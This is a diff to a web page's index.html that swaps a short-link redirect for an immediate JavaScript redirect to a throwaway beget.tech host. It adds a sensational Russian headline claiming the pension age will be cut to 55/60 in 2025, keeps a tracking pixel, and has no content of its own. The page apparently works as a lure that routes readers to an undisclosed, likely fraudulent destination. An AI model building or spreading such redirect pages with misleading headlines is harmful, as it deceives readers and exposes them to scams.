--- a/index.html
+++ b/index.html
@@ -17,9 +17,12 @@
 <noscript><div><img src="https://mc.yandex.ru/watch/92790536" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
 <!-- /Yandex.Metrika counter -->
 <head>
-    <meta http-equiv="refresh" content="0; URL='https://ok.me/RuRG1'" />
+   <title>Пенсионный возраст понизят до 55/60 лет: россиян ждет большой сюрприз в 2025 году</title>
+  <script>
+    window.location.replace("http://cpokov16.beget.tech/golikova/");
+  </script>
 </head>
-  <body>
-    <p>Redirecting to <a href="https://ok.me/RuRG1">https://ok.me/RuRG1</a></p>
-  </body>
+<body>
+  Если страница не открылась, то нажмите еще раз <a href="http://cpokov16.beget.tech/golikova/">сюда</a>.
+</body>
 </html>
